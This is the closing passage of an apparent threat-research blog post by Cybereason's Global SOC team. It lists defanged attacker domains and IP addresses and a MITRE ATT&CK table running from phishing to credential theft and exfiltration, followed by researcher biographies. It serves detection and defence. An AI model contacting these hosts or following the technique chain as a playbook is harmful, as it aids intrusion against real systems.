- zasewalli[.]fun
- endofyour[.]ink
- pedrosimanez[.]fun
- kingflipp[.]online
- beliale232634[.]at
- belialw869367[.]at
- belialq449663[.]at

**IP Addresses**

- 23.111.114[.]52
- 104.168.44[.]130
- 185.70.184[.]8

## MITRE ATT&CK Techniques

| Tactic | Technique |
|---|---|
| Initial Access | Phishing: [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/) |
| Execution | User Execution: [Malicious File](https://attack.mitre.org/techniques/T1204/002/) |
| Execution | [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/) |
| Persistence | Scheduled Task/Job: Scheduled Task |
| Defense Evasion | Abuse Elevation Control Mechanism: Bypass User Account Control |
| Defense Evasion | Signed Binary Proxy Execution: [Regsvr32](https://attack.mitre.org/techniques/T1218/010/) |
| Defense Evasion | Signed Binary Proxy Execution: [Rundll32](https://attack.mitre.org/techniques/T1218/011/) |
| Defense Evasion | Modify Registry |
| Discovery | Account Discovery |
| Discovery | [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482/) |
| Discovery | [Network Service Scanning](https://attack.mitre.org/techniques/T1046/) |
| Discovery | [Remote System Discovery](https://attack.mitre.org/techniques/T1018/) |
| Lateral Movement | Remote Services: [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001/) |
| Credential Access | [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003/) |
| Exfiltration | Exfiltration Over Alternative Protocol |

## About the Researchers:

**Eli Salem, Senior Security Analyst, Cybereason Global SOC**

Eli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber security industry since 2017.
In his free time, he publishes articles about malware research and threat hunting.

**Aleksandar Milenkoski, Senior Malware and Threat Analyst, Cybereason Global SOC**

Aleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research activities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for Science, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion detection and reverse engineering security mechanisms of the Windows operating system.

**Brian Janower, Security Analyst, Cybereason Global SOC**

Brian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages security incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the current threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information & Cyber.

**Yonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC**

Yonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force, where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware analysis, digital forensics, and incident response.

**Rotem Rostami, Security Analyst, Cybereason Global SOC**

Rotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis activities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious operations prevalent in the current threat landscape.
Rotem has been working in the cybersecurity industry since 2018.

## About the Author

**Cybereason Global SOC Team**

The Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves.

[All Posts by Cybereason Global SOC Team](https://www.cybereason.com/blog/authors/cybereason-global-soc-team)